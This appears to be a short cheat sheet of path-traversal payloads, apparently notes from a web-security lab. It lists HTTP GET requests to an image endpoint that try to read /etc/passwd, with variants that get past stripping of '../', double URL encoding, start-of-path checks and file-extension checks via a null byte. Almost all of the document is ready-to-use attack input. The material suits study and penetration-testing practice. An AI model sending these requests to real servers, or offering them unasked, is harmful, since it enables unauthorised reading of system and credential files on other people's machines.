Skip to content

Path traversal

# /etc/passwd
GET /image?filename=%2fetc%2fpasswd

# The application strips path traversal sequences from the user-supplied filename before using it.
# ....//....//....//etc/passwd
# after the application strips path traversal sequences, the request becomes to ../../../etc/passwd
GET /image?filename=....%2f%2f....%2f%2f....%2f%2fetc%2fpasswd

# url-encoded twicely
GET /image?
# ../../../etc/passwd
filename=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34

# validation of start of path
GET /image?filename=/var/www/images/../../../etc/passwd

# validation of file extension with null byte (%00) bypass
GET /image?filename=..%2f..%2f..%2fetc%2fpasswd%00.png